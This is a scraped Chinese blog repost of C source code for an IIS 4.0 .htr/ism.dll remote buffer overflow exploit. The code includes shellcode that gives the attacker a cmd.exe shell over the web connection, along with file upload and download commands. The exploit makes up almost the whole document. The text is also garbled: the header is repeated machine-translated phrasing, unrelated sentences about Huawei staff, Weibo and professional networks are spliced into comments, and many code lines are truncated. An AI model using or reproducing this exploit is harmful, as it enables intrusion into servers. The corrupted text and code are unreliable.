itfan123IIS4.0的.htr映射ism.dll溢出攻击程序VC6源码
原创IIS4.0的.htr映射ism.dll溢出攻击程序
作者: 袁哥
/----------------------------------------------------------/
/ IIS4.0的.htr映射ism.dll溢出攻击程序 序 /
/ 该程序实现所有语言版本该程序实现所有语言版本该程序在所有语言中都可用WINDOWS在溢出攻击下。 /
/ SHELLCODE代码实现实现绑定代码实现绑定代码实现绑定cmd.exe启用上载的功能,启用上载的功能,用于上载的功能,启用上载的功能, /
/ 下载文件下载文档下载文件下载文件ftp无需打开即可实现加密传输功能的功能 /
/ 端口,没有服务,可以绕过防火墙等。原来的真实 /
/ 当前源代码编写当前源代码准备现在编写源代码shellcode可以促进准备的方法,可以促进准备的方法, /
/ 修改、调试修改、调试修改、调试shellcode2007年,华为有全球存在的一年,华为有全球存在的2007年,华为有全球的一年,华为有全球的 /
/ shellcode成为可能。它还解决了溢出攻击的几个根源 /
/ 本问题:1万人,占员工总数百万人,占员工总数百万人,占员工总数2、shellcode定位; /
/ 3、jmp esp功能代码地址确定。功能代码地址确定。功能代码地址标识。功能代码地址标识。4、WINDOWS的API /
/ 万名员工中的一万名员工 /
/ WWW函数,则可以在不修改WEB如果是页面文件,请替换如果是页面文件,请替换 /
/ 换所有WEB页面。 /
/ 一般的溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序也可以使用这个框架 /
/ /
/ 程序在vc6.0在编译下的编译下进行编译,使用 /
/----------------------------------------------------------/
/*
iis4.0 overflow program ver 1.0
copy by yuange < [yuange@163.net](mailto:yuange@163.net) > 2000。05。8
*/
#include
#include
#include
#include
#define FNENDLONG 0x08
#define NOPCODE B // INC EDX 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
// c:\inetpub\wwwroot 物理路径长度。物理路径长度。
// 因为WWW处理GET /华为全球员工保护投资到位ISM.DLL处理,因此溢出点和物理路径具有
// 脱下来。你可以从.IDC,.ida,.idq泄漏物理路径方法以获得物理路径长度
#define RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define ADD1 0xxxx-0xxxxx-PATHLONG+4
#define ADD2 0xxxxx-0xxxxx-PATHLONG+4
/* 在这些内部数据披露后,华为 2000.10.25 */
// 有关要处理的两个参数的地址,请参见后面的ISM.DLL这句话很快登上了微博热搜,引发了网民们的讨论。
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 12
#define DATAXORCODE 0xAA
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define WEBPORT 80
void shellcodefnlock();
void shellcodefn(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;
int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0"
"strend";
char buff1[]="GET /""\xff""default.htr/";
char buff2[]=".HTR HTTP/1.1 \nHOST:";
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx";
// ret
char eipexcept[]="\xxx\xxx\xxx\xxx";
char eipwinnt[] ="\xxx\xxx\xxx\xxx";
char eipwinnt2[]="\xxx\xxx\xxx\xxx";
char reteax[] ="\xxx\xxx\xxx\xxx";
/* 在这些内部数据披露后,华为 2000.10.25 */
char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct sockaddr\_in s\_in2,s\_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
int i,j,k;
unsigned char temp;
int fd;
u\_short port,port1,shellcodeport;
SOCKET d\_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange( [yuange@nsfocus.com](mailto:yuange@nsfocus.com) ) 2000.6.2.");
fprintf(stderr,"\n welcome to my homepage [http://yuange.yeah.net](http://yuange.yeah.net) .");
fprintf(stderr,"\n welcome to [http://www.nsfocus.com](http://www.nsfocus.com) .");
fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]);
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i2){
offset=atoi(argv[2]);
}
OVERADD+=offset;
/*
if(offset<0||offset>3){
fprintf(stderr,"\n offset error !offset 0 - 3 .");
gets(buff);
exit(1);
}
*/
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];
for(i=0;ih\_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF\_INET, SOCK\_STREAM,0);
i=8000;
setsockopt(fd,SOL\_SOCKET,SO\_RCVTIMEO,(const char *) &i,sizeof(i));
s\_in3.sin\_family = AF\_INET;
s\_in3.sin\_port = htons(port);
s\_in3.sin\_addr.s\_addr = d\_ip;
printf("\n nuke ip: %s port %d",inet\_ntoa(s\_in3.sin\_addr),htons(s\_in3.sin\_port));
if(connect(fd, (struct sockaddr *)&s\_in3, sizeof(struct sockaddr\_in))!=0) {
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
gets(buff);
exit(1);
}
\_asm{
mov ESI,ESP
cmp ESI,ESP
}
\_chkesp();
chkespadd=\_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else memcpy(buff,buff1,strlen(buff1));
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);
sendpacketlong=k+i;
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}
for(i=0;i2){
server=argv[2];
if(strcmp(server,"win9x")==0){
memcpy(buff+OVERADD,eipwin9x,4);
fprintf(stderr,"\n nuke win9x.");
}
if(strcmp(server,"winnt")==0){
memcpy(buff+OVERADD,eipwinnt,4);
fprintf(stderr,"\n nuke winnt.");
}
}
*/
sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
/*
#ifdef DEBUG
\_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
*/
if(argc>6){
if(strcmp(argv[6],"debug")==0){
\_asm{
lea esp,buff
add esp,OVERADD
ret
}
}
}
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send packet %d bytes.",j);
send(fd,buff,j,0);
k=newrecv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
xordatabegin=1;
k=-1;
fprintf(stderr,"\n ok!\n");
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
k=1;
while(k!=0){
if(k<0){
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
}
else{
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
}
else i=1;
}
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
newsend(fd,buff,k+2,0);
}
k=newrecv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
xordatabegin=1;
k=-1;
}
if(k>0){
buff[k]=0;
fprintf(stderr,"%s",buff);
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
void shellcodefnlock()
{
\_asm{
nop
nop
nop
nop
nop
nop
nop
nop
\_emit(?)
xor ecx,ecx
add si,474h
cmp dword ptr [esi],ecx
jnz getesi
add si,4
getesi: mov esi,[esi]
add si,8
xor ecx,ecx
mov byte ptr [esi],cl
jmp next
getediadd: pop EDI
push EDI
pop ESI
push ebx // ecb
push ebx // call shellcodefn ret address
xor ecx,ecx
looplock: lodsb
cmp al,cl
jz shell
cmp al,0x30
jz clean0
sto: xor al,DATAXORCODE
stosb
jmp looplock
clean0: lodsb
sub al,0x40
jmp sto
next: call getediadd
shell: NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void shellcodefn(char *ecb)
{
char Buff[SHELLBUFFSIZE+2];
int *except[3];
FARPROC Sleepadd;
FARPROC GetLastErroradd;
FARPROC GetFileSizeadd;
FARPROC CreateFileAadd;
FARPROC WriteFileadd;
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC procloadlib;
FARPROC apifnadd[1];
FARPROC procgetadd=0;
FARPROC writeclient= *(int *)(ecb+0x84);
FARPROC readclient = *(int *)(ecb+0x88);
HCONN ConnID = *(int *)(ecb+8) ;
char *stradd;
int imgbase,fnbase,i,k,l;
HANDLE libhandle,fpt; //libwsock32;
STARTUPINFO siinfo;
PROCESS\_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int lBytesRead;
int lockintvar1,lockintvar2;
char lockcharvar;
SECURITY\_ATTRIBUTES sa;
\_asm {
jmp nextcall
getstradd: pop stradd
lea EDI,except
mov eax,dword ptr FS:[0]
mov dword ptr [edi+0x08],eax
mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;
imgbase=0x77e00000;
\_asm{
call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;
if(*( WORD *)imgbase==ZM&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))==EP){
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;
if(*(int *)k ==NREK&&*(int *)(k+4)==23LE){
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
if(*(int *)(imgbase+*(int *)k)==PteG&&*(int *)(4+imgbase+*(int *)k)==Acor){
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
k+=*(int *)(fnbase+0x10)-1;
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
procgetadd=k+imgbase;
break;
}
}
}
}
}
// 搜索KERNEL32。DLL模块地址和模块地址以及API函数 GetProcAddress地址
// 为了进一步了解什么是有效的网络,让我们再看看Deb.她有一小群核心联系人--14个她真正依赖的人。有效的核心网络的规模通常在12至18人之间.但真正重要的是结构.核心联系必须连接更小、更多样化的群体,并跨越等级、组织、职能和地理界限.核心关系应该导致更多的学习,减少决策中的偏见,以及更大的个人成长和平衡.你的核心圈子里的人也应该是积极行为的典范,因为如果你周围的人是热情的、真实的和慷慨的,你也会这样.
\_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}
if(procgetadd==0) goto die ;
for(k=1;k0){
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0){
for(k=0;k4&&Buff[0]==p&&Buff[1]==u&&Buff[2]==t&&Buff[3]== ){
l=*(int *)(Buff+4);
// WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
fpt=CreateFileAadd(Buff+0x8,FILE\_FLAG\_WRITE\_THROUGH+GENERIC\_WRITE,FILE\_SHARE\_READ,NULL,CREATE\_ALWAYS,FILE\_ATTRIBUTE\_NORMAL,0)
;
k=GetLastErroradd();
i=0;
while(l>0){
k=readclient(ConnID,Buff,&lBytesRead);
if(k==1){
if(lBytesRead>0){
for(k=0;k10000) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else{
if(k==1&&lBytesRead>4&&Buff[0]==g&&Buff[1]==e&&Buff[2]==t&&Buff[3]== ){
fpt=CreateFileAadd(Buff+4,GENERIC\_READ,FILE\_SHARE\_READ+FILE\_SHARE\_WRITE,NULL,OPEN\_EXISTING,FILE\_ATTRIBUTE\_NORMAL,0);
Sleepadd(100);
l=GetFileSizeadd(fpt,&k);
*(int *)Buff=ezis; //size
*(int *)(Buff+4)=l;
lBytesRead=8;
for(i=0;i0){
k=SHELLBUFFSIZE;
ReadFileadd(fpt,Buff,k,&k,0);
if(k>0){
for(i=0;i100) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else l=1;
}
}
if(k!=1){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
while(1){
Sleepadd(0x7fffffff); //僵死
}
}
else{
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
// Sleepadd(1000);
}
}
}
die: goto die ;
\_asm{
getexceptretadd: pop eax
push eax
mov edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
errprogram: mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344 //stradd-0xe
xor eax,eax //2
ret //1
execptprogram: jmp errprogram //2 bytes stradd-7
nextcall: call getstradd //5 bytes
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;
for(i=0;i0){
size=0x800;
ReadFile(fpt,buff,size,&size,NULL);
if(size>0){
newsend(fd,buff,size,0);
// Sleep(0100);
filesize-=size;
}
}
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("\n put file ok!\n");
Sleep(1000);
}
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i0){
buff[i]=0;
if(memcmp(buff,"size",4)==0){
filesize=*(int *)(buff+4);
j=100;
}
else {
j=0;
printf("\n recv %s",buff);
}
}
else ++j;
// if(j>1000) i=0;
}
printf("\n file %d bytes %d\n",filesize,i);
if(i>8){
i-=8;
WriteFile(fpt,buff+8,i,&i,NULL);
filesize-=i;
}
while(filesize>0){
size=newrecv(fd,buff,0x800,0);
if(size>0){
WriteFile(fpt,buff,size,&size,NULL);
filesize-=size;
}
else {
if(size==0) {
printf("\n ftp close \n ");
}
else {
printf("\n Sleep(100)");
Sleep(100);
}
}
}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
int newrecv(int fd,char *buff,int size,int flag)
{
int i,k;
k=recv(fd,buff,size,flag);
if(xordatabegin==1){
for(i=0;i 转载于:https://www.cnblogs.com/F4ncy/archive/2005/04/20/142212.html
版权声明
所有资源都来源于爬虫采集,如有侵权请联系我们,我们将立即删除
相关文章
